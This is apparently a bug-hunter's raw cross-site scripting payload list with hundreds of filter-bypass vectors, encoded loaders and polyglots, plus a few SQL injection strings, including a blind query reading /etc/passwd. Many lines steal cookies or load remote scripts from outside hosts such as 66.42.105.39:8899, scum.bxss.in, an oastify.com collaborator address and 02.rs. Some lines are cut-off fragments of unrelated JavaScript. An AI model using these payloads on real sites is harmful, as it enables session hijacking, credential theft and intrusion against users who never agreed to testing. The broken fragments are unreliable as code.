
+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()
$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$
[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))
${alert(1)}
{{$on.constructor('alert(1)')()}}
{%00{constructor.constructor('alert(1)')()}%00}
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
'1337'.replace(window,window[Symbol['replace']]=alert)
'1337'.split(window,window[Symbol['split']]=alert)
'1/-alert\5023\51/';
[1].group(alert)
%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
%2527-alert[dot]call(this,1)-%2527
**2^Z>>3)**8*50>Y||T|(q=S(X&Y&Z,a=b=-1,T=Z/w)*2/Z+1/Z));Y+=b)X-=a
%3CEvil%20script%20goes%20here%3E=%0AByPass
%3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E 
"><a69/onclick=[1].findIndex(alert)>click
"><a69/onclick=[1].findIndex(alert)>pew
"><a href=&#01javascript:alert(1)>
<a/href="/alert(/AmoloHT/)/">
"><a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
"><a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At&colon;/**/alert()/**/>click
"><a href="jav%0Dascript&colon;alert(1)">
"><a href=javas&#99;ript:alert(1)>
"><a/href="javascript%0A%0D:alert()>clickme
<a href=javascript:'\74svg/onload\75alert\501\51\76'>
 <a href=”JaVaSCrIpT:alert(1)”>Click</a>
<a href=//X55.is autofocus onfocus=import(href)>
<a id="x" data-toggle="collapse" href="#x" data-parent="<img src=x onerror=alert(1) />">XSS</a>
 [alert][0].call(this,1)
'-alert(1)-'
/alert(1)//\
\"-alert(1)}//
\'-alert(1)//
\';alert(1)//
'^alert()^' 'alert()' '/alert()/'
#alert.bind()(1)
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
#alert.valueOf()(1)
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
&apos;-alert(414)-&apos;
&apos;-alert(document.domain)-&apos;
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
"autofocus onfocus=alert(1)//
<Base Href=//X55.is>
"><bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
"><body onload='setInterval(f=_=>{for(t++,o=i=0,w=35;i<384;o+=i++%+w?(f+f+f)[i].fontcolor(g==9?"#FFF":[0,g,0]):"\n")g=0|(i/w-t/((i
"><body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
=BYPASS%00")});alert(1);$(document).ready(function%20(){%2f%2f
ccc\"-alert(1)}//
cookieStore.getAll().then(x=>fetch('//02.rs/'+JSON.stringify(x)))
data%3Atext%2Fhtml%2C%253Cscript%253Ealert%2528%2527Vulnerable%2527%2529%253C%252Fscript%253E
d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b
"><details ontoggle=alert(1)>
"><deTails open ontoggle=confirm`1`>
"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
"><div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>state=%2527+and+(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ 
'">><div><meter onmouseover="alert(1)"</div>"
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>
#document.body.innerHTML=eval('Error``.stack//# sourceURL=http://\u{3c}img/src/onerror=alert(1)\u{3e}//')
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document.location='javascript:alert%2823%29'
eval.apply`${[`alert\x2823\x29`]}`
eval.call`${'alert\x2823\x29'}`
eval.call`${top.name}`
eval.constructor`eval\x28name\x29```
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`1`>
[]["filter"]["constructor"]`alert\x2823\x29```
hacker"; alert('xss'); var $a= "
&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ 
?id='<svg/onload=alert(1)>\
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;66.42.105.39:8899&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;scum.bxss.in&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<iframe src="http://66.42.105.39:8899/iframe.html"></iframe>
<iframe src="https://xblindx.vercel.app/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"> //web messages and a JavaScript URL
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"> //web messages and a JavaScript URL
<image href='1' onerror='alert(1)' /></svg>#x" />
<><img src=1 onerror=alert(1)>
"><img src onerror=alert(1)>
<--`<img/src=` onerrOr=confirm``> --!>1
<img/src/onerror=location=String.fromCodePoint.call`${106}${97}${118}${97}${115}${99}${114}${105}${112}${116}${58}${97}${108}${101}${114}${116}${40}${49}${41}`>
<img/src/onerror=location=unescape`%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u003a%u0061%u006c%u0065%u0072%u0074%u0028%u0064%u006f%u0063%u0075%u006d%u0065%u006e%u0074%u002e%u0064%u006f%u006d%u0061%u0069%u006e%u0029`>
"><Img Src=//X55.is OnLoad=import(src)>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bS5ieHNzLmluIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61 onerror=eval(atob(this.id))>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bWRlc3Ryb3kueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>
"><img/src=x onError="`${x}`;alert(`Ex.Mi`);">
<img src=x onerror=alert(1)//
<img src=x onerror=location=atob`AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4`>
<img src=x onerror=location=atob&grave;AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4&grave;>
<img src=x onerror="new Image().src = `http://66.42.105.39:8899/?c=${document.cookie}`" />
<img src=x onerror="this.src='http://356htjbnux9lfbmvgwe415ug379zxo.oastify.com/'+document.cookie; this.removeAttribute('onerror');">
<img/src=x+/onerror=this['src']='https://server.com/test.png?'+document['cookie']>
<img src='zzz.jpg' onerror= alert('xss') ></img>
injection%22%20style=%22animation-name:swoop-up%22%20onanimationstart=%22alert(document.domain)
<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(doc
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
<input onbeforeinput=alert(1)>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bS5ieHNzLmluIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; autofocus>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bWRlc3Ryb3kueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; autofocus>
"><input/oninput='new Function`confir\u006d\`0\``'>
?<input type="search" onsearch="aler\u0074(1)">
"><input type="text" value=`` <div/autofocus/onfo<!--esi-->cus='a<!--esi-->lert("XSS")’>X</div>
"><isindex action="javas&tab;cript:alert(1)" type=image>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://66.42.105.39:8899\';document.body.appendChild(a)')
javascript:eval('var a=document.createElement('script');a.src='https://scum.bxss.in';document.body.appendChild(a)')
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//># HTML INJECTION
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
"><j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x 
location=/javascript:alert%2823%29/.source;
location = /javascript:/.source + alert.name+x+23+x
[].map.call`${eval}\\u{61}lert\x281337\x29`
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
>><marquee loop=1 width=0 onfinish=alert(1)>
"><marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
"/><marquee onfinish=confirm(123)>a</marquee>
"><marquee/onstart=confirm(2)>
"><meter onmouseover="alert(1)"
*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
navigation.navigate('javascript:alert(1)')
"><noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
nov 2022
"><object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
"><object/data=javascript:alert()>
Object.prototype.source=location.hash;
Object.prototype.toString=RegExp.prototype.toString;
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
{onerror=alert}throw 23
onerror=alert;throw 23;
{onerror=eval}throw/0/+name
{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}
onhashchange=setTimeout;
Oracledbms_pipe.receive_message(('a'),10)
"><p draggable=True ondragstart=prompt()>alert
"><p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
PostgreSQLSELECT pg_sleep(10)
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3
<p slot-scope="){}}])+this.constructor.constructor('alert(1)')()})};//">
red ' onmouseover='alert(1337)'
RegExp.prototype.toString;
<script>$.getScript("//66.42.105.39:8899")</script>
<script>$.getScript("//scum.bxss.in")</script>
<!----><script>alert(0);</script>
?"></script><base%20c%3D=href%3Dhttps:\mysite>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
</script><embed/embed/embed/src=//14.rs>
</script><embed/embed/embed/src=//xblindx.verel.app>
<script>eval("ale" + "rt('xss')")</script>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//66.42.105.39:8899");a.send();</script>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//scum.bxss.in");a.send();</script>
</script><img src=1 onerror=alert(document.domain)>
<script>location="https://www.google.com/search?q=</title><h1><marquee><s>Injection<!--"</script>
</script><script>alert(1)</script>
<script src="http://66.42.105.39:8899/payload.js"></script>
"><script src=http://66.42.105.39:8899></script>
"><script src=https://scum.bxss.in></script>
<Script Src=//X55.is>
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
  <script type="text/javascript"  xlink:href="URL"></script>
<script>var i=new Image;i.src="http://356htjbnux9lfbmvgwe415ug379zxo.oastify.com/"+document.cookie;</script>
"><scRipT>Window.prototype.__proto__.x.ownerDocument.defaultView.alert(1)</script>
<script>x=document.querySelector('form');x.setAttribute('method','GET');x.setAttribute('action','https://scum.bxss.in/');</script> 
<scrpt>confrm()</scrpt>
<sc<script>ript> alert('xss') </scri</script>pt>
setInterval`alert\x2823\x29`
setTimeout`alert\x2823\x29`
[].sort.call`${alert}1337`
str0d"/><style>@KeyframeS x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str>
"><style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<style>:target {color:red;}</style>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
<svg><animatetransform%20§§=1>
<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'>
<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'> <image href='1' onerror='alert(1)' /></svg>#x" /> <use id=x />
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<<svg/onload=alert(1)>
<svg Onload=alert%26%230000000040"1")>
<svg/onload='alert&#40 23 &#41'> 
<Svg OnLoad=import('//X55.is')>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
?"><svg/Onload=prompt(1);>
"><svg onload\r\n=$.globalEval("al"+"ert()");>
<!--><svg onload='top[/al/.source+/ert/.source](document.cookie)'>
<svg><set onbegin=d=document,b=/`/.source,d[/loca/.source+/tion/.source]=/javascript&colon;aler/.source+/t/.source+b+domain+b>
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)' /></svg>#x" />
<svg version="1.1" baseProfile="full" xmlns="http://w3.org/2000/svg" xmlns:xlink="http://w3.org/1999/xlink" >
<svg version="1.1" baseProfile="full" xmlns="http://w3.org/2000/svg" xmlns:xlink="http://w3.org/1999/xlink"><script type="text/javascript"  xlink:href="URL"></script></svg>
t3_u9po1l%20onmouseover=alert(document.domain)%20y=/t1_i5sxroa
"><table background="javascript:alert(1)"></table>
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
umen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
Union Select@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k#  (add more @k's to match number of columns)
?url=data:,<svg/onload=alert(1)>
url=data:text/html,<script>alert('Vulnerable')</script>
var{a:onerror}={a:alert};throw 1
var{haha:onerror=alert}=0;throw 1
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bS5ieHNzLmluIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2N1bWRlc3Ryb3kueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
%w)**5%w+3)+w*t)%w;p.innerHTML=o},t=9)'bgcolor=X><pre id=p>
window.name='1;var Uncaught=1;alert(23)';
window.name="alert(23)"
window.name="alert(23)";
x%27%29%3bconfirm%28%271
<x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x>
<x data-spy="affix" data-target="<img src=x onerror=alert(1)>">
<x data-spy="scroll" data-target="<img src=x onerror=alert(1) />">XSS</x>
<x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x>
<x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x>
<x data-toggle="tooltip" data-container="<img src=x onerror=alert(1) />" title="x">XSS</x>
<x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x>
x={...eval+0,toString:Array.prototype.shift,length:15},
<x href="<img src=x onerror=alert(0)>" data-dismiss="alert">XSS</x>
x='javascript:alert\x2823\x29';x={x:location}=this
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
xss.html alternative:
xss.html contents:
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS HUNTER - RIP - BLISTENER LIVES
<xss id=x onfocus=alert(document.cookie) tabindex=1>#x';
<xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
XSS"><input %00 onControl hello oninput=confirm(domain) x>
<xss style="display:block;transition:outline 1s;" ontransitionend=alert(1) id=x tabindex=1>test</xss>
(X=t?X+r*50:0,i=h=11+6*C(t*4+X%1)<<5;--i;x.fillRect(...t?[X-r*i/4,600+(r*8&3?i-h:h-i),i/4,2]:[i*8,r*999,h,r]))r=Math.random()
<x v-if=_c.constructor('alert(1)')()>
x+x+x+x+x+x+x+x+x+x+x+x+x,
{y:''.constructor.prototype}.y.charAt=[].join;[1]|orderBy:'x=alert(1)'
